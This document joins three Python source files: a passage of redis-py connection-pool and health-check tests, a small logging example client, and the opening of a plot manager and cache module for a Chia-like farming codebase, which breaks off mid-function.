connection_kwargs=None,
max_connections=None,
connection_class=redis.Connection,
):
connection_kwargs = connection_kwargs or {}
pool = redis.ConnectionPool(
connection_class=connection_class,
max_connections=max_connections,
**connection_kwargs,
)
return pool
def test_connection_creation(self):
connection_kwargs = {"foo": "bar", "biz": "baz"}
pool = self.get_pool(
connection_kwargs=connection_kwargs, connection_class=DummyConnection
)
connection = pool.get_connection("_")
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(connection_kwargs=connection_kwargs)
c1 = pool.get_connection("_")
c2 = pool.get_connection("_")
assert c1 != c2
def test_max_connections(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(max_connections=2, connection_kwargs=connection_kwargs)
pool.get_connection("_")
pool.get_connection("_")
with pytest.raises(redis.ConnectionError):
pool.get_connection("_")
def test_reuse_previously_released_connection(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(connection_kwargs=connection_kwargs)
c1 = pool.get_connection("_")
pool.release(c1)
c2 = pool.get_connection("_")
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
connection_kwargs = {
"host": "localhost",
"port": 6379,
"db": 1,
"client_name": "test-client",
}
pool = self.get_pool(
connection_kwargs=connection_kwargs, connection_class=redis.Connection
)
expected = (
"ConnectionPool<Connection<"
"host=localhost,port=6379,db=1,client_name=test-client>>"
)
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
connection_kwargs = {"path": "/abc", "db": 1, "client_name": "test-client"}
pool = self.get_pool(
connection_kwargs=connection_kwargs,
connection_class=redis.UnixDomainSocketConnection,
)
expected = (
"ConnectionPool<UnixDomainSocketConnection<"
"path=/abc,db=1,client_name=test-client>>"
)
assert repr(pool) == expected
class TestBlockingConnectionPool:
def get_pool(self, connection_kwargs=None, max_connections=10, timeout=20):
connection_kwargs = connection_kwargs or {}
pool = redis.BlockingConnectionPool(
connection_class=DummyConnection,
max_connections=max_connections,
timeout=timeout,
**connection_kwargs,
)
return pool
def test_connection_creation(self, master_host):
connection_kwargs = {
"foo": "bar",
"biz": "baz",
"host": master_host[0],
"port": master_host[1],
}
pool = self.get_pool(connection_kwargs=connection_kwargs)
connection = pool.get_connection("_")
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(connection_kwargs=connection_kwargs)
c1 = pool.get_connection("_")
c2 = pool.get_connection("_")
assert c1 != c2
def test_connection_pool_blocks_until_timeout(self, master_host):
"When out of connections, block for timeout seconds, then raise"
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(
max_connections=1, timeout=0.1, connection_kwargs=connection_kwargs
)
pool.get_connection("_")
start = time.time()
with pytest.raises(redis.ConnectionError):
pool.get_connection("_")
# we should have waited at least 0.1 seconds
assert time.time() - start >= 0.1
def test_connection_pool_blocks_until_conn_available(self, master_host):
"""
When out of connections, block until another connection is released
to the pool
"""
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(
max_connections=1, timeout=2, connection_kwargs=connection_kwargs
)
c1 = pool.get_connection("_")
def target():
time.sleep(0.1)
pool.release(c1)
start = time.time()
Thread(target=target).start()
pool.get_connection("_")
assert time.time() - start >= 0.1
def test_reuse_previously_released_connection(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(connection_kwargs=connection_kwargs)
c1 = pool.get_connection("_")
pool.release(c1)
c2 = pool.get_connection("_")
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
pool = redis.ConnectionPool(
host="localhost", port=6379, client_name="test-client"
)
expected = (
"ConnectionPool<Connection<"
"host=localhost,port=6379,db=0,client_name=test-client>>"
)
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
pool = redis.ConnectionPool(
connection_class=redis.UnixDomainSocketConnection,
path="abc",
client_name="test-client",
)
expected = (
"ConnectionPool<UnixDomainSocketConnection<"
"path=abc,db=0,client_name=test-client>>"
)
assert repr(pool) == expected
class TestConnectionPoolURLParsing:
def test_hostname(self):
pool = redis.ConnectionPool.from_url("redis://my.host")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "my.host",
}
def test_quoted_hostname(self):
pool = redis.ConnectionPool.from_url("redis://my %2F host %2B%3D+")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "my / host +=+",
}
def test_port(self):
pool = redis.ConnectionPool.from_url("redis://localhost:6380")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"port": 6380,
}
@skip_if_server_version_lt("6.0.0")
def test_username(self):
pool = redis.ConnectionPool.from_url("redis://myuser:@localhost")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"username": "myuser",
}
@skip_if_server_version_lt("6.0.0")
def test_quoted_username(self):
pool = redis.ConnectionPool.from_url(
"redis://%2Fmyuser%2F%2B name%3D%24+:@localhost"
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"username": "/myuser/+ name=$+",
}
def test_password(self):
pool = redis.ConnectionPool.from_url("redis://:mypassword@localhost")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"password": "mypassword",
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
"redis://:%2Fmypass%2F%2B word%3D%24+@localhost"
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"password": "/mypass/+ word=$+",
}
@skip_if_server_version_lt("6.0.0")
def test_username_and_password(self):
pool = redis.ConnectionPool.from_url("redis://myuser:mypass@localhost")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"username": "myuser",
"password": "mypass",
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url("redis://localhost", db=1)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"db": 1,
}
def test_db_in_path(self):
pool = redis.ConnectionPool.from_url("redis://localhost/2", db=1)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"db": 2,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url("redis://localhost/2?db=3", db=1)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"db": 3,
}
def test_extra_typed_querystring_options(self):
pool = redis.ConnectionPool.from_url(
"redis://localhost/2?socket_timeout=20&socket_connect_timeout=10"
"&socket_keepalive=&retry_on_timeout=Yes&max_connections=10"
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"db": 2,
"socket_timeout": 20.0,
"socket_connect_timeout": 10.0,
"retry_on_timeout": True,
}
assert pool.max_connections == 10
def test_boolean_parsing(self):
for expected, value in (
(None, None),
(None, ""),
(False, 0),
(False, "0"),
(False, "f"),
(False, "F"),
(False, "False"),
(False, "n"),
(False, "N"),
(False, "No"),
(True, 1),
(True, "1"),
(True, "y"),
(True, "Y"),
(True, "Yes"),
):
assert expected is to_bool(value)
def test_client_name_in_querystring(self):
pool = redis.ConnectionPool.from_url("redis://location?client_name=test-client")
assert pool.connection_kwargs["client_name"] == "test-client"
def test_invalid_extra_typed_querystring_options(self):
with pytest.raises(ValueError):
redis.ConnectionPool.from_url(
"redis://localhost/2?socket_timeout=_&" "socket_connect_timeout=abc"
)
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url("redis://localhost?a=1&b=2")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {"host": "localhost", "a": "1", "b": "2"}
def test_calling_from_subclass_returns_correct_instance(self):
pool = redis.BlockingConnectionPool.from_url("redis://localhost")
assert isinstance(pool, redis.BlockingConnectionPool)
def test_client_creates_connection_pool(self):
r = redis.Redis.from_url("redis://myhost")
assert r.connection_pool.connection_class == redis.Connection
assert r.connection_pool.connection_kwargs == {
"host": "myhost",
}
def test_invalid_scheme_raises_error(self):
with pytest.raises(ValueError) as cm:
redis.ConnectionPool.from_url("localhost")
assert str(cm.value) == (
"Redis URL must specify one of the following schemes "
"(redis://, rediss://, unix://)"
)
class TestConnectionPoolUnixSocketURLParsing:
def test_defaults(self):
pool = redis.ConnectionPool.from_url("unix:///socket")
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
}
@skip_if_server_version_lt("6.0.0")
def test_username(self):
pool = redis.ConnectionPool.from_url("unix://myuser:@/socket")
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"username": "myuser",
}
@skip_if_server_version_lt("6.0.0")
def test_quoted_username(self):
pool = redis.ConnectionPool.from_url(
"unix://%2Fmyuser%2F%2B name%3D%24+:@/socket"
)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"username": "/myuser/+ name=$+",
}
def test_password(self):
pool = redis.ConnectionPool.from_url("unix://:mypassword@/socket")
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"password": "mypassword",
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
"unix://:%2Fmypass%2F%2B word%3D%24+@/socket"
)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"password": "/mypass/+ word=$+",
}
def test_quoted_path(self):
pool = redis.ConnectionPool.from_url(
"unix://:mypassword@/my%2Fpath%2Fto%2F..%2F+_%2B%3D%24ocket"
)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/my/path/to/../+_+=$ocket",
"password": "mypassword",
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url("unix:///socket", db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"db": 1,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url("unix:///socket?db=2", db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"db": 2,
}
def test_client_name_in_querystring(self):
pool = redis.ConnectionPool.from_url("redis://location?client_name=test-client")
assert pool.connection_kwargs["client_name"] == "test-client"
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url("unix:///socket?a=1&b=2")
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {"path": "/socket", "a": "1", "b": "2"}
def test_connection_class_override(self):
class MyConnection(redis.UnixDomainSocketConnection):
pass
pool = redis.ConnectionPool.from_url(
"unix:///socket", connection_class=MyConnection
)
assert pool.connection_class == MyConnection
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
class TestSSLConnectionURLParsing:
def test_host(self):
pool = redis.ConnectionPool.from_url("rediss://my.host")
assert pool.connection_class == redis.SSLConnection
assert pool.connection_kwargs == {
"host": "my.host",
}
def test_connection_class_override(self):
class MyConnection(redis.SSLConnection):
pass
pool = redis.ConnectionPool.from_url(
"rediss://my.host", connection_class=MyConnection
)
assert pool.connection_class == MyConnection
def test_cert_reqs_options(self):
import ssl
class DummyConnectionPool(redis.ConnectionPool):
def get_connection(self, *args, **kwargs):
return self.make_connection()
pool = DummyConnectionPool.from_url("rediss://?ssl_cert_reqs=none")
assert pool.get_connection("_").cert_reqs == ssl.CERT_NONE
pool = DummyConnectionPool.from_url("rediss://?ssl_cert_reqs=optional")
assert pool.get_connection("_").cert_reqs == ssl.CERT_OPTIONAL
pool = DummyConnectionPool.from_url("rediss://?ssl_cert_reqs=required")
assert pool.get_connection("_").cert_reqs == ssl.CERT_REQUIRED
pool = DummyConnectionPool.from_url("rediss://?ssl_check_hostname=False")
assert pool.get_connection("_").check_hostname is False
pool = DummyConnectionPool.from_url("rediss://?ssl_check_hostname=True")
assert pool.get_connection("_").check_hostname is True
class TestConnection:
def test_on_connect_error(self):
"""
An error in Connection.on_connect should disconnect from the server
see for details: https://github.com/andymccurdy/redis-py/issues/368
"""
# this assumes the Redis server being tested against doesn't have
# 9999 databases ;)
bad_connection = redis.Redis(db=9999)
# an error should be raised on connect
with pytest.raises(redis.RedisError):
bad_connection.info()
pool = bad_connection.connection_pool
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@pytest.mark.onlynoncluster
@skip_if_server_version_lt("2.8.8")
@skip_if_redis_enterprise()
def test_busy_loading_disconnects_socket(self, r):
"""
If Redis raises a LOADING error, the connection should be
disconnected and a BusyLoadingError raised
"""
with pytest.raises(redis.BusyLoadingError):
r.execute_command("DEBUG", "ERROR", "LOADING fake message")
assert not r.connection._sock
@pytest.mark.onlynoncluster
@skip_if_server_version_lt("2.8.8")
@skip_if_redis_enterprise()
def test_busy_loading_from_pipeline_immediate_command(self, r):
"""
BusyLoadingErrors should raise from Pipelines that execute a
command immediately, like WATCH does.
"""
pipe = r.pipeline()
with pytest.raises(redis.BusyLoadingError):
pipe.immediate_execute_command("DEBUG", "ERROR", "LOADING fake message")
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@pytest.mark.onlynoncluster
@skip_if_server_version_lt("2.8.8")
@skip_if_redis_enterprise()
def test_busy_loading_from_pipeline(self, r):
"""
BusyLoadingErrors should be raised from a pipeline execution
regardless of the raise_on_error flag.
"""
pipe = r.pipeline()
pipe.execute_command("DEBUG", "ERROR", "LOADING fake message")
with pytest.raises(redis.BusyLoadingError):
pipe.execute()
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt("2.8.8")
@skip_if_redis_enterprise()
def test_read_only_error(self, r):
"READONLY errors get turned in ReadOnlyError exceptions"
with pytest.raises(redis.ReadOnlyError):
r.execute_command("DEBUG", "ERROR", "READONLY blah blah")
def test_connect_from_url_tcp(self):
connection = redis.Redis.from_url("redis://localhost")
pool = connection.connection_pool
assert re.match("(.*)<(.*)<(.*)>>", repr(pool)).groups() == (
"ConnectionPool",
"Connection",
"host=localhost,port=6379,db=0",
)
def test_connect_from_url_unix(self):
connection = redis.Redis.from_url("unix:///path/to/socket")
pool = connection.connection_pool
assert re.match("(.*)<(.*)<(.*)>>", repr(pool)).groups() == (
"ConnectionPool",
"UnixDomainSocketConnection",
"path=/path/to/socket,db=0",
)
@skip_if_redis_enterprise()
def test_connect_no_auth_supplied_when_required(self, r):
"""
AuthenticationError should be raised when the server requires a
password but one isn't supplied.
"""
with pytest.raises(redis.AuthenticationError):
r.execute_command(
"DEBUG", "ERROR", "ERR Client sent AUTH, but no password is set"
)
@skip_if_redis_enterprise()
def test_connect_invalid_password_supplied(self, r):
"AuthenticationError should be raised when sending the wrong password"
with pytest.raises(redis.AuthenticationError):
r.execute_command("DEBUG", "ERROR", "ERR invalid password")
@pytest.mark.onlynoncluster
class TestMultiConnectionClient:
@pytest.fixture()
def r(self, request):
return _get_client(redis.Redis, request, single_connection_client=False)
def test_multi_connection_command(self, r):
assert not r.connection
assert r.set("a", "123")
assert r.get("a") == b"123"
@pytest.mark.onlynoncluster
class TestHealthCheck:
interval = 60
@pytest.fixture()
def r(self, request):
return _get_client(redis.Redis, request, health_check_interval=self.interval)
def assert_interval_advanced(self, connection):
diff = connection.next_health_check - time.time()
assert self.interval > diff > (self.interval - 1)
def test_health_check_runs(self, r):
r.connection.next_health_check = time.time() - 1
r.connection.check_health()
self.assert_interval_advanced(r.connection)
def test_arbitrary_command_invokes_health_check(self, r):
# invoke a command to make sure the connection is entirely setup
r.get("foo")
r.connection.next_health_check = time.time()
with mock.patch.object(
r.connection, "send_command", wraps=r.connection.send_command
) as m:
r.get("foo")
m.assert_called_with("PING", check_health=False)
self.assert_interval_advanced(r.connection)
def test_arbitrary_command_advances_next_health_check(self, r):
r.get("foo")
next_health_check = r.connection.next_health_check
r.get("foo")
assert next_health_check < r.connection.next_health_check
def test_health_check_not_invoked_within_interval(self, r):
r.get("foo")
with mock.patch.object(
r.connection, "send_command", wraps=r.connection.send_command
) as m:
r.get("foo")
ping_call_spec = (("PING",), {"check_health": False})
assert ping_call_spec not in m.call_args_list
def test_health_check_in_pipeline(self, r):
with r.pipeline(transaction=False) as pipe:
pipe.connection = pipe.connection_pool.get_connection("_")
pipe.connection.next_health_check = 0
with mock.patch.object(
pipe.connection, "send_command", wraps=pipe.connection.send_command
) as m:
responses = pipe.set("foo", "bar").get("foo").execute()
m.assert_any_call("PING", check_health=False)
assert responses == [True, b"bar"]
def test_health_check_in_transaction(self, r):
with r.pipeline(transaction=True) as pipe:
pipe.connection = pipe.connection_pool.get_connection("_")
pipe.connection.next_health_check = 0
with mock.patch.object(
pipe.connection, "send_command", wraps=pipe.connection.send_command
) as m:
responses = pipe.set("foo", "bar").get("foo").execute()
m.assert_any_call("PING", check_health=False)
assert responses == [True, b"bar"]
def test_health_check_in_watched_pipeline(self, r):
r.set("foo", "bar")
with r.pipeline(transaction=False) as pipe:
pipe.connection = pipe.connection_pool.get_connection("_")
pipe.connection.next_health_check = 0
with mock.patch.object(
pipe.connection, "send_command", wraps=pipe.connection.send_command
) as m:
pipe.watch("foo")
# the health check should be called when watching
m.assert_called_with("PING", check_health=False)
self.assert_interval_advanced(pipe.connection)
assert pipe.get("foo") == b"bar"
# reset the mock to clear the call list and schedule another
# health check
m.reset_mock()
pipe.connection.next_health_check = 0
pipe.multi()
responses = pipe.set("foo", "not-bar").get("foo").execute()
assert responses == [True, b"not-bar"]
m.assert_any_call("PING", check_health=False)
def test_health_check_in_pubsub_before_subscribe(self, r):
"A health check happens before the first [p]subscribe"
p = r.pubsub()
p.connection = p.connection_pool.get_connection("_")
p.connection.next_health_check = 0
with mock.patch.object(
p.connection, "send_command", wraps=p.connection.send_command
) as m:
assert not p.subscribed
p.subscribe("foo")
# the connection is not yet in pubsub mode, so the normal
# ping/pong within connection.send_command should check
# the health of the connection
m.assert_any_call("PING", check_health=False)
self.assert_interval_advanced(p.connection)
subscribe_message = wait_for_message(p)
assert subscribe_message["type"] == "subscribe"
def test_health_check_in_pubsub_after_subscribed(self, r):
"""
Pubsub can handle a new subscribe when it's time to check the
connection health
"""
p = r.pubsub()
p.connection = p.connection_pool.get_connection("_")
p.connection.next_health_check = 0
with mock.patch.object(
p.connection, "send_command", wraps=p.connection.send_command
) as m:
p.subscribe("foo")
subscribe_message = wait_for_message(p)
assert subscribe_message["type"] == "subscribe"
self.assert_interval_advanced(p.connection)
# because we weren't subscribed when sending the subscribe
# message to 'foo', the connection's standard check_health ran
# prior to subscribing.
m.assert_any_call("PING", check_health=False)
p.connection.next_health_check = 0
m.reset_mock()
p.subscribe("bar")
            # the second subscribe issues exactly one command (the subscribe)
# and the health check is not invoked
m.assert_called_once_with("SUBSCRIBE", "bar", check_health=False)
# since no message has been read since the health check was
# reset, it should still be 0
assert p.connection.next_health_check == 0
subscribe_message = wait_for_message(p)
assert subscribe_message["type"] == "subscribe"
assert wait_for_message(p) is None
# now that the connection is subscribed, the pubsub health
# check should have taken over and include the HEALTH_CHECK_MESSAGE
m.assert_any_call("PING", p.HEALTH_CHECK_MESSAGE, check_health=False)
self.assert_interval_advanced(p.connection)
def test_health_check_in_pubsub_poll(self, r):
"""
Polling a pubsub connection that's subscribed will regularly
check the connection's health.
"""
p = r.pubsub()
p.connection = p.connection_pool.get_connection("_")
with mock.patch.object(
p.connection, "send_command", wraps=p.connection.send_command
) as m:
p.subscribe("foo")
subscribe_message = wait_for_message(p)
assert subscribe_message["type"] == "subscribe"
self.assert_interval_advanced(p.connection)
# polling the connection before the health check interval
# doesn't result in another health check
m.reset_mock()
next_health_check = p.connection.next_health_check
assert wait_for_message(p) is None
assert p.connection.next_health_check == next_health_check
m.assert_not_called()
# reset the health check and poll again
# we should not receive a pong message, but the next_health_check
# should be advanced
p.connection.next_health_check = 0
assert wait_for_message(p) is None
m.assert_called_with("PING", p.HEALTH_CHECK_MESSAGE, check_health=False)
self.assert_interval_advanced(p.connection)
|
example_client.py
|
from __future__ import print_function
import os
import sys
import time
import logging
import threading
from functools import partial
from logcollector.client_utils import make_log_collecting_decorator
def main():
# logger name is not important; root logger (and above) is monitored.
logger = logging.getLogger('simpletest')
# logger level still matters as usual
logger.setLevel(logging.INFO)
# So we also see the output on the client console
logger.addHandler(logging.StreamHandler(sys.stdout))
SERVER = '127.0.0.1'
PORT = 3000
# Make a decorator with server and port already bound
send_log_with_key = make_log_collecting_decorator(SERVER, PORT)
@send_log_with_key(lambda task_key, *args, **kwargs: task_key)
def do_some_stuff(task_key, other_param, other_param2):
print("STARTING task {}...".format(task_key))
N_MSG = 30
        for i in range(N_MSG):
time.sleep(1.0)
logger.info("Task {}:({}) Test message {}: with args: %s, %d".format(task_key, threading.current_thread().ident, i ),
'hi', 42, extra={'status': '{:.1f}'.format(100.*(i+1)/N_MSG)})
print("DONE.")
threads = []
for i in range(100):
# Use i as the 'task_key'
func = partial(do_some_stuff, '{:03d}'.format(i), 'foo', 'bar')
threads.append(threading.Thread(target=func))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Iterator
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from flaxlight.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from flaxlight.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
stream_plot_info_pk,
stream_plot_info_ph,
)
from flaxlight.util.ints import uint16
from flaxlight.util.path import mkdir
from flaxlight.util.streamable import Streamable, streamable
from flaxlight.types.blockchain_format.proof_of_space import ProofOfSpace
from flaxlight.types.blockchain_format.sized_bytes import bytes32
from flaxlight.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
show_memo: bool
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
show_memo: bool = False,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.show_memo = show_memo
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
def batches() -> Iterator[Tuple[int, List[Path]]]:
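                # Yields (files_remaining_after_this_batch, batch_of_paths) so the batch
                # callback below can report progress; an empty plot list still yields one
                # empty batch so the refresh completes normally.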
if total_size > 0:
for batch_start in range(0, total_size, self.refresh_parameter.batch_size):
batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size)
yield total_size - batch_end, plot_paths[batch_start:batch_end]
else:
yield 0, []
for remaining, batch in batches():
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
                # Set the remaining file count since `refresh_batch()` doesn't know it, but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.removed += batch_result.removed
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {total_result.loaded}, "
f"total_result.removed {total_result.removed}, "
f"total_duration {total_result.duration:.2f} seconds"
)
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if not file_path.exists():
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
